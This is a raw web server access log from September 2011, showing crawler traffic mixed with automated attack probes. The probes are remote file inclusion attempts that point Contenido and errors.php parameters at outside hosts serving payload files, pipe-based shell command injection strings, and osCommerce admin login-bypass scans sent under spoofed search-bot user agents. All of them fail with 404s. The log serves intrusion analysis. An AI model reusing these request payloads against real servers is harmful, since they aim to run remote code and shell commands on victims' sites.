89.151.124.250 - - [02/Sep/2011:16:43:52 +0000] "GET /Account/access_log.txt/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:54 +0000] "GET /Account/access_log.txt/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 348 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:55 +0000] "GET /errors.php?error=test?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:56 +0000] "GET /errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:57 +0000] "GET /errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:58 +0000] "GET /Account/errors.php?error=test?? HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:43:59 +0000] "GET /Account/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:44:01 +0000] "GET /Account/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:05 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00e580a0e551b6f9eb6e9a296778f1a7ffd5a0bf0311e5102450',%200)/errors.php?error=test?? HTTP/1.1" 404 543 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:06 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00e580a0e551b6f9eb6e9a296778f1a7ffd5a0bf0311e5102450',%200)/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 543 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:07 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00e580a0e551b6f9eb6e9a296778f1a7ffd5a0bf0311e5102450',%200)/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 543 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:08 +0000] "GET /errors.php?error=test?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:09 +0000] "GET /errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:11 +0000] "GET /errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:12 +0000] "GET /Account/errors.php?error=test?? HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:13 +0000] "GET /Account/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/copy.jpg?? HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
89.151.124.250 - - [02/Sep/2011:16:56:14 +0000] "GET /Account/errors.php?error=http://www.secure13.inmotionhosting.com/~warepa5/auction/uploaded/paste.jpg?? HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
77.88.26.27 - - [02/Sep/2011:17:29:09 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [02/Sep/2011:20:15:45 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [02/Sep/2011:20:15:45 +0000] "GET /?C=M;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [02/Sep/2011:22:46:31 +0000] "GET /?C=N;O=D HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.158.245 - - [02/Sep/2011:23:34:53 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
77.88.26.27 - - [03/Sep/2011:00:27:15 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
119.63.196.18 - - [03/Sep/2011:00:37:25 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.88.26.27 - - [03/Sep/2011:00:47:38 +0000] "GET /?C=M;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [03/Sep/2011:01:26:35 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.80.194.33 - - [03/Sep/2011:01:57:04 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Supplied by blueyonder; SV1; .NET CLR 1.1.4322)"
95.108.158.245 - - [03/Sep/2011:03:27:06 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
69.94.28.54 - - [03/Sep/2011:03:49:50 +0000] "GET /Account/access_log.txt/errors.php?error=test?? HTTP/1.1" 404 348 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:51 +0000] "GET /Account/access_log.txt/errors.php?error=http://mpress.com.ua//components/com_datsogallery/images/multi.jpg?? HTTP/1.1" 404 348 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:52 +0000] "GET /Account/access_log.txt/errors.php?error=http://mpress.com.ua//components/com_datsogallery/images/user.jpg?? HTTP/1.1" 404 348 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:53 +0000] "GET /errors.php?error=test?? HTTP/1.1" 404 325 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:54 +0000] "GET /errors.php?error=http://mpress.com.ua//components/com_datsogallery/images/multi.jpg?? HTTP/1.1" 404 325 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:55 +0000] "GET /errors.php?error=http://mpress.com.ua//components/com_datsogallery/images/user.jpg?? HTTP/1.1" 404 325 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:56 +0000] "GET /Account/errors.php?error=test?? HTTP/1.1" 404 333 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:57 +0000] "GET /Account/errors.php?error=http://mpress.com.ua//components/com_datsogallery/images/multi.jpg?? HTTP/1.1" 404 333 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:03:49:58 +0000] "GET /Account/errors.php?error=http://mpress.com.ua//components/com_datsogallery/images/user.jpg?? HTTP/1.1" 404 333 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 392 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 392 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 392 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:05:14 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 392 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00f350a81f51b6f9eb6e9a296778f1a7ffd5a0bf030736e6c995',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 587 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00b1bc2cfe51b6f9eb6e9a296778f1a7ffd5a0bf0345da622818',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://190.189.9.141:8080////appserv/Ckrid11.txt? HTTP/1.1" 404 587 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00f350a81f51b6f9eb6e9a296778f1a7ffd5a0bf030736e6c995',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 587 "-" "MaMa CaSpEr"
85.17.238.12 - - [03/Sep/2011:04:08:42 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','3','%22%2Fcontenido%2Fincludes%22','',%20'00b1bc2cfe51b6f9eb6e9a296778f1a7ffd5a0bf0345da622818',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 587 "-" "MaMa CaSpEr"
69.94.28.54 - - [03/Sep/2011:04:29:18 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 392 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:19 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mpress.com.ua//components/com_datsogallery/images/multi.jpg?? HTTP/1.1" 404 392 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:21 +0000] "GET /Account/access_log.txt//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mpress.com.ua//components/com_datsogallery/images/user.jpg?? HTTP/1.1" 404 392 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:22 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:23 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mpress.com.ua//components/com_datsogallery/images/multi.jpg?? HTTP/1.1" 404 368 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:24 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mpress.com.ua//components/com_datsogallery/images/user.jpg?? HTTP/1.1" 404 368 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:25 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:26 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mpress.com.ua//components/com_datsogallery/images/multi.jpg?? HTTP/1.1" 404 377 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
69.94.28.54 - - [03/Sep/2011:04:29:27 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://mpress.com.ua//components/com_datsogallery/images/user.jpg?? HTTP/1.1" 404 377 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
65.52.104.89 - - [03/Sep/2011:07:37:52 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [03/Sep/2011:07:38:36 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 216515 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
95.108.158.245 - - [03/Sep/2011:07:50:02 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
123.125.71.107 - - [03/Sep/2011:07:58:57 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
95.108.158.245 - - [03/Sep/2011:10:20:44 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
180.76.5.25 - - [03/Sep/2011:11:40:16 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [03/Sep/2011:11:50:43 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [03/Sep/2011:11:50:43 +0000] "GET /Account/?C=D;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [03/Sep/2011:11:52:13 +0000] "GET /Account/?C=D;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.60.19.170 - - [03/Sep/2011:12:35:17 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
65.60.19.170 - - [03/Sep/2011:12:35:18 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
46.182.104.128 - - [03/Sep/2011:12:35:48 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:35:48 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:35:48 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:35:48 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
212.92.23.172 - - [03/Sep/2011:12:35:48 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:35:49 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:35:50 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:35:50 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.182.104.128 - - [03/Sep/2011:12:35:52 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:35:52 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
212.92.23.172 - - [03/Sep/2011:12:36:00 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:36:01 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.182.104.128 - - [03/Sep/2011:12:37:19 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:37:20 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:37:44 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:37:44 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:38:05 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:38:06 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
212.92.23.172 - - [03/Sep/2011:12:38:22 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:23 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:23 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:26 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:26 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:27 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:35 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:35 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:38:36 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:42:48 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','12','6','%22%2Fadmin%2Ffile_manager.php%22++.pl','',%20'00c9c8142bf5090f76f7db7f414ff26cfaa1e5ad8f3daecd701b',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 576 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:42:48 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:42:48 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
